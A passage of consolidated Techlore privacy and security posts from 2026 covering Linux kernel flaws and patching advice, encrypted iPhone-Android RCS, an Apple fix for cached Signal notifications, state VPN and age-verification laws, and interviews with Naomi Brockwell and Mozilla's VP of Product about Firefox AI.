security.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260516-NAOMI-INTERVIEW-thumbnail-v1-1-34ea8beef33d746acfe331e2a322e063ee4f3c7401e6e4f2ad15c5afdc98aa00.jpg)](https://techlore.tech/naomi-brockwell-on-digital-privacy-legislation-the-third-party-doctrine-and-fighting-the-surveillance-state-with-the-surveillance-accountability-act-2/) And finally, I put out a quick review taking a look at a 'dumb' screen from TRMNL for those who are curious about the focused device: [TRMNL: A Screen That Doesn’t Want Your AttentionE-ink displays that promise ambient, distraction-free information sound great in theory. TRMNL delivers on the concept, with open firmware & open hardware, but the reality of living with it is more nuanced. Here are my thoughts! Watch on Techlore.TV for an ad-free, surveillance-free viewing experience![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v8-1-2e4ba314b0d899f8149c17f78eeac0b9ba8884bba78205ded1e65c19d287f769.png)](https://techlore.tech/trmnl-a-screen-that-doesnt-want-your-attention/) --- ## Action Item ✅ Very simple, if you're using any Microsoft services: Get them up-to-date and keep following for changes in the upcoming weeks! #### This Week's Sources ****Highlight: A Week Of Microsoft Vulnerabilities** - - - - - - - ****Story 1: Shai-Hulud Wave Compromises 600 npm Packages** - - ****Story 2: Signal Threatens To Pull Out Of Canada Over Lawful Access Bill** - ****Story 3: Meta To Use AI Visual Analysis To Detect Underage Users** - ****Story 4: Bitwarden Is Quietly Changing And People Are Worried** - ****The Defense Bulletin** ****Data Breaches** - - - - - - ****Threats** - - - - - - - - - - - ****FOSS+ Updates** - - - - - - - - - ### TRMNL: A Screen That Doesn't Want Your Attention URL: https://techlore.tech/trmnl-a-screen-that-doesnt-want-your-attention/ Last updated: 2026-05-19T21:11:40.000Z E-ink displays that promise ambient, distraction-free information sound great in theory. TRMNL delivers on the concept, with open firmware & open hardware, but the reality of living with it is more nuanced. Here are my thoughts! [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Naomi Brockwell on Digital Privacy Legislation, the Third Party Doctrine, and Fighting the Surveillance State with The Surveillance Accountability Act URL: https://techlore.tech/naomi-brockwell-on-digital-privacy-legislation-the-third-party-doctrine-and-fighting-the-surveillance-state-with-the-surveillance-accountability-act-2/ Last updated: 2026-08-19T15:00:29.000Z [Naomi Brockwell on the Surveillance Accountability Act, Developer Arrests, and Why You Can’t Opt Out | Techlore Talks | Episode 71The federal government doesn’t need a warrant to buy your location data, your financial records, or your private information from data brokers. The Surveillance Accountability Act wants to change that. In this Techlore Talks interview, Henry sits down with Naomi Brockwell, host of NBTV and…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-1.ico)Naomi Brockwell on the Surveillance Accountability Act, Developer Arrests, and Why You Can't Opt Out![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc.webp)](https://share.transistor.fm/s/7bb28c9a) The federal government doesn't need a warrant to buy your location data, your financial records, or your private information from data brokers. The Surveillance Accountability Act wants to change that. ### You can't just wait until you need privacy There were many options for a good teaser here, but I chose this one: > Naomi: *"No one is doing the work. This idea that ‘I’ll just explore privacy when I need it’ isn't going to cut it. Privacy could be outlawed by the time that comes around."* To me, that framing hits differently than most other privacy arguments. It's not just about getting people to switch to Signal anymore. If something doesn’t change, we’re facing a world where these tools might not be legal to use at all, and those who develop them end up behind bars. ### Decentralization doesn't automatically include privacy There's a common assumption that if something is decentralized, it's inherently private. Naomi pushes back on this, and it's one of the most clarifying things I've heard on the topic: > Naomi: *"You can't stop the system. You can target individuals everywhere and a system can keep running. But individuals will not have the freedom to use that system safely if they don't know how to use the internet privately. That is the big difference people are just not thinking about."* Decentralization protects the system. It doesn't protect you. ### On privacy doomerism Naomi's reframe of AI, which many people treat as purely a threat, is thought-provoking: > Naomi: *"Suddenly individuals have the same power in their hands as governments previously used to target and oppress them. That's empowering. That's a reason to rejoice."* She's not dismissing the threat. She's pointing out that the same technology enabling mass surveillance can be run locally on your own hardware. You can analyze the telemetry leaving your device. You can plug the leaks. These weren't capabilities most of us had before. And, on opting out entirely, she said: > Naomi: *"You can't opt out, guys. Gone is the era where you can be a Luddite and say I won't participate. Flock cameras are everywhere. Throwing out your devices won't save you as you walk down the street. So now, you have to decide: Which weapon are you going to put in your arsenal?"* This is the reality of modern life. It's completely unrealistic to think we can fully escape the system. So, a decision has to be made about how to exist *within* the system. ### Why are governments and companies getting away with this? People understand a warrant is needed for law enforcement to walk into your house and dig through your stuff. They need a warrant to physically take your belongings, including digital devices like your phone and computer. But when it comes to digital information, it's a free-for-all. Henry asked why Naomi thinks this is the case, and her first point resonated deeply: > Naomi: *Digital surveillance is not visible to the eye. It's not like someone's pounding on your door and you get that physical interaction with them. When that happens, it's very clear when a government is intruding into your protected space. When they're querying Google's database and going through all of your emails from the last 15 years, and checking all of your private messages, and checking the flock cameras to see everywhere you've traveled, they could do it without you even knowing.* Most people have no idea this is happening. If they knew just how deep this rabbit hole was, I'd like to think there would be serious outrage. ### The Surveillance Accountability Act The bill itself is straightforward in concept: If the government wants to search your data (including buying it from a data broker), they need a warrant. That's what the Fourth Amendment already says. The loophole being closed is that buying data from a third party doesn't currently count as a "search" under existing court precedent, so no warrant is required. > Naomi: *"The judiciary is nowhere in sight. There's zero accountability and no one's getting warrants anymore. They're literally just buying giant data sets from data brokers and searching them at will. No probable cause. No reason. They're going on fishing expeditions."* The bill also includes a private right of action — if the government doesn't get a warrant, you can sue them. If you want to support it, [check out the site](https://www.surveillanceaccountability.com/). There's a script you can copy and paste to contact your representative. ### Why contacting your rep actually works Naomi gives the most practical explanation I've heard for why individual action matters: > Naomi: *"If you get 10 people to call a specific rep, that's enough to get that rep briefed. You get a hundred people, that's a bigger briefing. You get a thousand people in a district and suddenly they're like, okay, this seems like a really big issue for our constituents."* Politicians respond to re-election pressure above almost everything else. Constituents are one of only two levers that move them. Most people consistently underuse that lever, and Naomi makes the case for why that gap needs to close. ### My takeaways This interview reminded me that tools alone aren't enough; that digital rights, like any other rights, have to be fought for. Naomi's not asking anyone to abandon the tools. She's saying we need people showing up in every arena: technology, yes, but also legislation and litigation. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • Surveillance Accountability Act: • Contact your rep (script included): • Naomi Brockwell TV: • Naomi's 501(c)(3): ### Why Even Smart People Think Privacy Is Dead URL: https://techlore.tech/why-even-smart-people-think-privacy-is-dead/ Last updated: 2026-05-19T21:09:57.000Z "Privacy is dead, lol." "You're naive to still care." If you've seen those comments under every privacy story, you've witnessed an engineered hopelessness (digital resignation) with a clear designer and a measurable cost. In this video, I break down who built it, why it's a lie, and the simple, free things you can do right now that produce results you can actually see. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Three Linux Exploits, ICE's 20M-Person Database, and Android's Good/Bad Week | May 13 URL: https://techlore.tech/three-linux-exploits-palantir-20m-person-database-and-androids-good-bad-week-surveimay-13/ Last updated: 2026-05-14T04:14:58.000Z ## On Our Radar 🎯 **Linux Just Took a Third Major Vulnerability** Last [week](https://youtu.be/YUZ7RQzfKzo) it was **Copy Fail**. This week we got two more: [**Dirty Frag**](https://arstechnica.com/security/2026/05/linux-bitten-by-second-severe-vulnerability-in-as-many-weeks/), a local privilege escalation that lets low-privileged users (including those inside virtual machines) gain root on servers, and now, dropping today: [**Fragnesia**](https://www.phoronix.com/news/Linux-Fragnesia)**—**a third vulnerability in the same family. Microsoft has already spotted attackers experimenting with Dirty Frag in the wild. This works across Linux distributions and has no obvious signs of exploitation. Some distributions have pushed out patches (Debian, AlmaLinux, and Fedora, and Tails) but Fragnesia is quite new and fixes will hopefully follow shortly. A question I've bene receiving:**"is Linux broken?"** While I understand the concern, these things can happen on every operating system. The question I like to ask is: what do these vulnerabilities expose about the *patching model, history,* and *response.* When you look at Apple or Microsoft, if a kernel flaw drops, you wait for the OS update and you're done. But on Linux, you have to figure out which of the three vulnerabilities your specific distro has actually addressed, when they shipped each patch, and how transparently they communicated about it. That fragmentation is the trade-off for the open-ended ecosystem people love about Linux. This is a legit weakness, but not a fatal one. This especially matters when we look at the flip side: open source is part of what made these easily findable in the first place. I don't think any of this should be a direct referendum on Linux. But I do think it's a reminder that "trust" in an operating system is built on response, frequency, and history over time. **What you can do:** Open your distro's update tool or package manager right now and pull the latest patches. Then check your distro's blog or mailing list for explicit statements about Copyfail, Dirty Frag, and Fragnesia. If you can't find them, ask in their community channels. I have no issue saying if your Linux distro has no communication about this, it may be time to hop on the [**distro hopping train**](https://essentials.techlore.tech/#desktop-operating-systems). Copy Fail has been around for weeks, and no communication by now is an indication they are not following proper security practices. ## Bits & Bytes 🤖 **\~** [**ICE Agents Are Carrying Phones With a Palantir Database of 20 Million People**](https://www.404media.co/ice-agents-have-list-of-20-million-people-on-their-iphones-thanks-to-palantir/) 404 Media reports that ICE agents are now using iPhones loaded with a Palantir-built lookup tool covering 20 million people with highlight sensitive personal information. **Our take:** This is the surveillance economy doing what it does best: it's the privatization of sensitive data that should worry everyone regardless of where they sit politically. It's good to ask yourself if you know if you're in the database, and if so—how did you get there, and of course if you can opt out. If your question to any of these questions is "I don't know..." then now you understand digital rights. **\~ Android's** [**Good News**](https://securitylab.amnesty.org/latest/2026/05/android-intrusion-logging-as-a-new-source-of-data-for-consensual-forensic-analysis/) **and** [**Bad News**](https://www.mullvad.net/en/blog/2026/5/12/any-app-on-recent-android-versions-can-leak-certain-traffic/) Mullvad disclosed a bug in Android 16 (the "Tiny UDP Cannon") that lets any app leak traffic outside the VPN tunnel, even with "Block connections without VPN" enabled. Google marked it won't-fix. GrapheneOS was also impacted, but fortunately patched it. On the upside, Google launched **Android Intrusion Logging** as part of Advanced Protection Mode, a new option for high-threat users to log security, DNS, and connection events for forensic analysis. **Our take:** A "won't fix" from Google on a confirmed VPN leak is rough, but an actual lockdown-style toolset for high-risk users is genuinely useful. I guess Google decided to unintentionally copy Apple by releasing tools designed for high threat models that [don't treat VPNs as first-class citizens. ](https://www.cnet.com/tech/services-and-software/mullvad-vpn-creates-ios-master-switch-to-protect-users-from-data-leaks/) **\~** [**Encrypted RCS Lands in iOS 26.5**](https://arstechnica.com/gadgets/2026/05/ios-macos-and-ipados-26-5-updates-arrive-with-encrypted-rcs-messaging-and-more/) Apple's iOS, macOS, and iPadOS 26.5 ship with end-to-end encrypted RCS messaging. This is an open standard, currently in beta, available on a subset of carriers that allows encrypted communication between iOS & Android users. **Our take:** This doesn't replace Signal and other trusted messengers. Metadata is still exposed and it's locked to default messaging apps, including iOS Messages and Google Messages. But it's a baseline raise for everyone still on SMS/RCS, the same way HTTPS raised the baseline for the web without replacing VPNs or Tor. This one is worth sharing with the family members who haven't switched to Signal. ## This Week on Techlore 📺 Want the full breakdown? Today's Surveillance Report covers everything above in depth, plus the full Defense Bulletin—data breaches, threats, and FOSS+ updates across Windows BitLocker, Signal, Debian, Tails, Fedora, IVPN, KDE, and more. Listen or watch below. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) ## Action Item ✅ Pull your Linux updates today and verify your distribution has shipped patches for Copyfail, Dirty Frag, **and** Fragnesia. If your distro hasn't been publicly transparent about all three, start asking in their community channels! --- #### Click For All Weekly Sources 🔗 ****Highlight: Linux Can't Catch A Break** - - - ****Story 1: ICE Has 20 Million People On Their iPhones** - ****Story 2: Android's Good News And Bad News** - - - ****The Defense Bulletin** **Data Breaches* - - - - - - - **Threats* - - - **FOSS+ Updates* - - - - - - - - ### iPhone-to-Android texts are finally encrypted. Here's what that actually means. URL: https://techlore.tech/iphone-to-android-texts-are-finally-encrypted-heres-what-that-actually-means/ Last updated: 2026-05-12T04:23:54.000Z iOS 26.5 shipped [today](https://arstechnica.com/gadgets/2026/05/ios-macos-and-ipados-26-5-updates-arrive-with-encrypted-rcs-messaging-and-more/), and tucked into the release notes is the biggest cross-platform messaging update in almost two decades: end-to-end encrypted RCS between iPhone and Android! ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/05/image-1.png) Credit: c0nfigurati0n.com (one of our Techlorians!) It's quite simple: every text between a green bubble and a blue bubble has either been plain SMS or unencrypted RCS—meaning the contents of everything you send are fully visible to carriers, network operators, and anyone with access to the infrastructure in between. But as of today, if you're on an iPhone running 26.5 and your friend is on Google Messages, your conversation's contents are protected end-to-end. That's worth celebrating. **Loudly**. This is the kind of quiet default improvement that helps millions of people who'll never install Signal, never read a privacy guide, never think about their threat model. It's the closest thing texting has had to HTTPS becoming default on the web. But, it's not all sunshines and rainbows...here are a couple things the headlines are missing: - **What this encryption actually protects:** This matters a lot. The contents of your messages are sealed. The metadata isn't: who you texted, when, how often, group membership, attachment sizes. That's still flowing through corporate infrastructure, the same way it always has. This makes RCS + E2EE *not* *a full replacement* to [dedicated security messengers](https://essentials.techlore.tech/#messengers) that prioritize user safety. - **Who gets to participate** matters even more. On iOS, only Apple Messages can use this, which is expected. On Android, there seems to be no indication of third-party SMS apps and the open-source alternatives on F-Droid getting access to things, as Google is maintaining control. The protocol underneath (MLS via GSMA) is technically open. But the client apps that implement it are a two-vendor club: Apple Messages and Google Messages. That's the list right now. So the right way to think about today: this is a floor, not a ceiling. It raises the baseline for billions of conversations that had no protection at all. But it doesn't replace Signal for the conversations where metadata and client diversity matter most. **As for me:** I'm not a frequent user of SMS or RCS. I use Signal, and when I need to use these tools I rely on VOIP services under an *'I expect this to be public'* basis. I don't foresee myself using E2EE via RCS any time soon until it opens up to other clients. But I know for a fact that most regular users will accidentally stumble on RCS with E2EE when they chat with a new friend who happens to be on the opposite mobile OS—and I'm very excited for these situations! I've got the full breakdown, what's worth celebrating, what's worth watching, and what I'm personally doing about this over on YouTube: ### Google Is Silently Sabotaging Custom ROMs URL: https://techlore.tech/google-is-silently-sabotaging-custom-roms/ Last updated: 2026-05-19T21:08:55.000Z Google's new reCAPTCHA can require Google Play Services to pass, meaning a de-Googled phone will fail the "are you human?" check. Combined with mandatory developer verification and AOSP going private, the pattern over the last year is impossible to ignore. Here's what I think it means for Android, custom ROMs, and the open-source community that built this whole ecosystem. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### The New Utah Law That Breaks Every VPN in America URL: https://techlore.tech/the-new-utah-law-that-breaks-every-vpn-in-america/ Last updated: 2026-05-19T21:07:29.000Z Utah just passed SB73, the first law in the US to take direct aim at VPNs, and it already went into effect May 6th. The law requires adult content sites to verify the age of every Utah user even if they're using a VPN (aka...everyone!) which experts say is technically impossible to comply with without verifying every person on earth. This is a blueprint other states are watching, and VPNs just became a legal target. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### CopyFail Explained, Utah's New VPN Law, and Microsoft Edge Keeping Passwords in Plaintext URL: https://techlore.tech/copyfail-explained-utahs-new-vpn-law-and-microsoft-edge-keeping-passwords-in-plaintext/ Last updated: 2026-05-08T04:54:55.000Z [CopyFail Explained, Utah’s New VPN Law, and Microsoft Edge Keeping Passwords in Plaintext | Techlore Surveillance Report | Episode 260This week’s Surveillance Report covers the most severe Linux threat in years sending researchers and admins scrambling, Apple patching the bug police were using to extract deleted Signal messages from iPhones, Utah’s new law regulating VPNs taking effect, and Microsoft Edge inexplicably storing…![](https://static.ghost.org/v5.0.0/images/link-icon.svg)CopyFail Explained, Utah's New VPN Law, and Microsoft Edge Keeping Passwords in Plaintext![](https://img.transistorcdn.com/uc1VAoVtfV6Phg9qH7-niocvqr-tqRSmVAwE3B6HEFI/rs:fill:0:0:1/w:800/h:800/q:60/mb:500000/aHR0cHM6Ly9pbWct/dXBsb2FkLXByb2R1/Y3Rpb24udHJhbnNp/c3Rvci5mbS84Mjk1/MDE2Y2Q3MjhmZTZm/MDRmYjliYzc2MjZl/MjQ5ZS5wbmc.webp)](https://share.transistor.fm/s/b0d787c2) This week's Surveillance Report covers the most severe Linux threat in years sending researchers and admins scrambling, Apple patching the bug police were using to extract deleted Signal messages from iPhones, Utah's new law regulating VPNs taking effect, and Microsoft Edge inexplicably storing your passwords in plaintext memory. 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) ## Episode Sources ### **Highlight: Most Severe Linux Threat in Years Has Researchers Scrambling** - - ### **Story 1: Apple Quietly Fixes the Bug Police Used to Extract Deleted Signal Messages** - - - ### **Story 2: Utah's New Law Regulating VPNs Takes Effect** - - - ### **Story 3: Microsoft Edge Caught Storing Your Passwords in Plaintext RAM — For Apparently No Reason** - ### **The Defense Bulletin** **Threats, Exploits & Supply Chain** - - - **Breaches** - - - --- **Updates & Good News** - - - - - ### If Android Locks Down Like iPhone, What's the Point? | TL Responds URL: https://techlore.tech/if-android-locks-down-like-iphone-whats-the-point-tl-responds/ Last updated: 2026-05-19T21:06:07.000Z You left your comments, I answered...from the Signal vs. Session debate to Android's dangerous lockdown trend, browser wars, VPN bans, and why "there's nothing I can do" is the most dangerous thing you can say about digital rights. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Your Deleted Signal Messages Were Never Really Gone, But Apple's Latest Update Fixed That | April 27 URL: https://techlore.tech/your-deleted-signal-messages-were-never-really-gone-but-apples-latest-update-fixed-that-april-27/ Last updated: 2026-04-28T04:39:21.000Z ## On Our Radar 🎯 [**The iPhone Bug That Turned "Disappearing" Messages Into a Paper Trail**](https://techcrunch.com/2026/04/22/apple-fixes-bug-that-cops-used-to-extract-deleted-chat-messages-from-iphones/) As we covered in our [last newsletter](https://techlore.tech/how-the-fbi-read-signal-messages-without-breaking-signal-april-14-2026/), it was revealed that notifications displaying message content were being cached on the device, even after the original messages had been deleted or auto-expired. Because of this, forensic tools used by police were able to extract the contents of Signal messages users believed were gone. Apple has now patched this issue on iPadOS & iOS 26.4.2\. This means for any of you worried about this problem, all you need to do is update your Apple devices, and it will even retroactively apply to old messages before the update. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/04/image-22.png) Signal's official Mastodon posts clarifying this. **What you can do:** Update your iPhone or iPad to the latest iOS/iPadOS version immediately if you haven't already. I'm seeing reports this security update is available as iOS 18.7.8 as well, so for those on older devices you still have a path forward. Do it in: `Settings → General → Software Update` --- ## Bits & Bytes 🤖 **\~** [**X Officially Launches X Chat**](https://www.socialmediatoday.com/news/x-officially-launches-x-chat/818508/) X has spun off its direct messaging feature into a dedicated standalone app called X Chat. The move mirrors what Meta did with Messenger by separating DMs from the main platform experience. The launch has raised eyebrows for reportedly overstating the app's security features, positioning it with language that implies private or encrypted messaging without the substance to back it up. **Our take:** A messaging app from one of the world's most surveillance-adjacent social platforms deserves skepticism. X has a track record of [questionable](https://www.npr.org/2022/09/13/1122671582/twitter-whistleblower-mudge-senate-hearing) [security](http://cnn.com/2022/08/23/tech/twitter-whistleblower-peiter-zatko-security/index.html) practices, and actively spreads [disinformation](https://x.com/elonmusk/status/1787589564917490059) about its *(safer)* competitors. Because of this, it's hard for us to even get an accurate, realistic read on its security claims. So until there's better clarity around its policies and we get a better assessment on its *real* protection, proceed at your own risk. If you're looking for a private messenger, the [options haven't changed. ](https://essentials.techlore.tech/#messengers) **\~** [**60%+ of Australian Kids Still Using Social Media Despite the Ban**](https://mollyrosefoundation.org/more-than-60-of-australian-children-still-using-social-media-despite-ban-for-under-16s-research-shows/) Australia's under-16 social media ban has been in force for months, and this new research shows it isn't working as intended. A poll found that over 60% of those who had accounts before the ban still have access to at least one restricted platform. TikTok, YouTube, and Instagram each retained over half of their pre-ban child users. **Our take:** We've said it before and we'll say it again: Outright bans of these services aren't likely to make kids safer. It just makes policymakers look responsive. Real child safety online requires accountability mechanisms with teeth. These social media bans ignore the real, addictive issues of social media, and do children (and adults!) a disservice. We hope the Australian government reconsiders their approach, and that other countries see what the reality of these bans actually looks like. **\~** [**Colorado's Age Verification Bill Carves Out Open Source**](https://linuxiac.com/colorado-adds-open-source-exemption-to-age-attestation-bill/) Colorado's SB51 age-attestation bill, which would require OS providers and app stores to supply an age-related signal so apps can identify minors has moved forward from a House committee with a significant new amendment. The updated language explicitly exempts open-source operating systems, applications, code repositories, and containerized software distributions! **Our take:** This is an amazing development and worth watching as a model for other states. The fact that Colorado's legislature responded to advocacy here, and wrote the exemption broadly enough to cover the ecosystem without naming specific projects shows that technical community engagement in policy processes actually works. Huge shoutout to System76 as they seem to have been a major part of making this happen—let them be a testament that communicating with politicians and making your voice heard is *not* useless! This can be replicated! --- ## This Week on Techlore 📺 Lots of fun updates these last 1-2 weeks for services many people in the community love. We had Tuta launch their new E2EE cloud service in private beta, I broke down my thoughts in an initial review: [Tuta Drive First Look: The Encrypted Platform That Does What Google and Apple Won’tTuta just launched their encrypted cloud storage in closed beta, completing a compelling zero-knowledge workspace with email, calendar, contacts, and drive. Here’s my first look at what’s there, what’s missing, and why this is bigger than just another cloud provider.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v10.png)](https://techlore.tech/tuta-drive-first-look-the-encrypted-platform-that-does-what-google-and-apple-wont/) Brave launched a paid, out-of-the-box debloated experience of their browser called Brave Origin—my full review: [Brave Origin Review: Is the New $60 Paid Browser Worth It?Brave just launched Brave Origin. A paid, stripped-down browser with no AI, no crypto wallet, and no telemetry. I paid $60 to test it so you know what to expect.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v6-1.png)](https://techlore.tech/brave-origin-review-is-the-new-60-paid-browser-worth-it/) After the Brave Origin review went live, our inbox lit up with so many of you asking for me to take a look at Helium browser, so we made it happen: [Helium Browser Review: Is This Minimal, Privacy-Focused Chromium Browser Worth Switching To?Helium Browser promises a privacy-respecting Chromium experience with no cryptocurrency, no AI, and no bloat. Here’s what I think after testing it head-to-head against Brave.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260421-HELIUM-BROWSER-FIRST-LOOK-thumbnail-v3.jpg)](https://techlore.tech/helium-browser-review-a-truly-minimal-privacy-focused-chromium-browser/) On Techlore Talks we've been lucky to have such incredible guests! We had a legal expert from the Free Software Foundation of Europe join us to chat about age verification, Bitwarden came to speak about password management, and we brought on Mozilla to see what their vision is for their new AI tools...and the controversy surrounding them. [Age Verification Laws and Free Software: A Legal Expert Tells Us What’s Actually at StakeTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260414-FSFE-JITHENDRA-INTERVIEW-thumbnail-v1.jpg)](https://techlore.tech/age-verification-laws-and-free-software-fsfe-interview-techlore-talks/) [Password Manager Security Explained: Argon2, PBKDF2, and Open Source with BitwardenTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260417-BITWARDEN-INTERVIEW-thumbnail-v2-1.jpg)](https://techlore.tech/password-manager-security-explained-with-bitwarden/) [Is Firefox AI Private? Mozilla’s VP of Product on AI Opt-Out Controls, Smart Window, and Having a Seat at the TableTechlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260424-FIREFOX-AI-INTERVIEW-thumbnail-v2.jpg)](https://techlore.tech/is-firefox-ai-private/) Finally, I made a video recapping the latest age verification laws in the EU and the US: [EU and US Age Verification Explained: What the ‘Parent’s Decide Act’ and EU Apps Actually Mean for Privacy & FreedomThis week, the US introduced a federal bill to put age verification directly into your operating system, and the EU launched an app to do the same thing using cryptography. Let’s break down exactly what each one does and why both have long-term implications that go far beyond protecting kids.![](https://static.ghost.org/v5.0.0/images/link-icon.svg)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/v4-1.png)](https://techlore.tech/eu-and-us-age-verification-explained-what-the-new-laws-and-apps-actually-mean-for-your-privacy-free/) ## Action Item ✅ Open your iPhone or iPad and update to the latest iOS right now. The patch Apple just released closes a real hole that was being exploited. `Settings → General → Software Update` ### Is Firefox AI Private? Mozilla's VP of Product on AI Opt-Out Controls, Smart Window, and Having a Seat at the Table URL: https://techlore.tech/is-firefox-ai-private/ Last updated: 2026-08-19T14:54:48.000Z AI is everywhere — including Firefox. But unlike most services, Mozilla allows you to turn it off completely. I went into this interview a little biased; I've been a Firefox user and Mozilla fan for a long time. I've also been tinkering with AI here and there to see what value it can add to my workflows. Some tools are genuinely transformational, while others feel useless. So when I learned Mozilla was adding AI to Firefox, I was interested to see what value they thought it would add. Here's an overview of Henry's conversation with Adam Fishman, Mozilla's VP of Product, along with some of my thoughts. --- ### Mozilla's reason for engaging with AI The teaser clip I chose was Adam explaining why Mozilla can't sit this one out: > Adam: *"Mozilla's never sat on the sidelines, like never. Going back 25 years. It's not our position to sit on the sidelines, especially if big things are shaping the future of how people use the web.”* He expanded on this later in the interview: > Adam: *“Regardless of how you feel about AI, I think one thing that's pretty clear is we're moving towards this new era of how people and computers interact with each other, and AI is going to have a really big impact on shaping access and the use of the Internet and information. And that has always been Mozilla's focus.”* If the companies shaping AI in browsers are primarily Google and Microsoft, having Mozilla at that table matters. As the developers of Gecko, one of the only remaining independent browser engines, them engaging with AI thoughtfully is exactly what I want to see. --- ### AI Features vs. Advocacy Henry had a great question: How much of Mozilla’s new AI is about adding features to Firefox, and how much is about advocacy? Adam touched on something I hadn’t thought of: > Adam: *"If you're a very anti-AI person, and you're like ‘No AI anywhere!’ What if you were also blind, and you needed that information because most people don't add their own alt text to images? That is a genuinely useful feature to a large swath of the population."* It's a good reminder that "AI" isn't one thing. An on-device model quietly generating alt text for images that would otherwise be invisible to a screen reader is a very different proposition than a data-hungry cloud model. The use case Adam is describing has real, tangible value for people who are often an afterthought in how software gets built. --- ### On-device AI is the way to go > Adam: *“We have an on-device AI model in Firefox. So that means it's not hitting a cloud server. It's not sending data anywhere else. It's literally doing this on your device.”* Here's where I land personally: if it's on-device and open source, I have zero issues with it, and am actually excited about it. The productivity potential alone is genuinely compelling. What I don't want is my data leaving my machine to train someone else's model. I think Firefox's Smart Window feature is a good approach. It stores context locally, doesn't sync to Mozilla's servers, and you can delete the models from your device entirely. --- ### The global off switch matters The opt-out is real. It’s not buried, and it works. > Adam: *“You can turn it all off if you want. And that is a feature that I have not seen any other browser do, is the ability to have a toggle that says, ‘get all this stuff out of my face, delete all the models that are locally on my machine, like gone. I don't want to be aware of it. I don't want to be exposed to it. I don't even want to see a marketing message that says you should use it.’ You can turn it all off. And then you can selectively reactivate stuff, if you want.”* In a world of enshittification, [terrible design choices](https://blog.johnozbay.com/what-happened-to-apples-attention-to-detail.html), and forced updates, Mozilla building what is effectively an AI kill switch is worth applauding. --- ### The Anthropic security partnership Anthropic’s security Red Team used Claude Opus to audit Firefox code: > Adam: *"Opus found 22 security vulnerabilities in a span of two weeks, which is 30-40% of all of the vulnerabilities that we found the entire previous year."* They started submitting PRs, and Mozilla noticed quickly. They reached out to Anthropic, and have since been working closely with them to rapidly fix security vulnerabilities. From a productivity and security standpoint, this is the kind of AI usage I want to see normalized. Not [vibe coded](https://www.ibm.com/think/topics/vibe-coding) apps riddled with bugs trying to replace human skill and judgment, but AI doing tedious, high-stakes work faster than any human team otherwise could. --- ### What I'm watching going forward I'm optimistic, but also keeping both 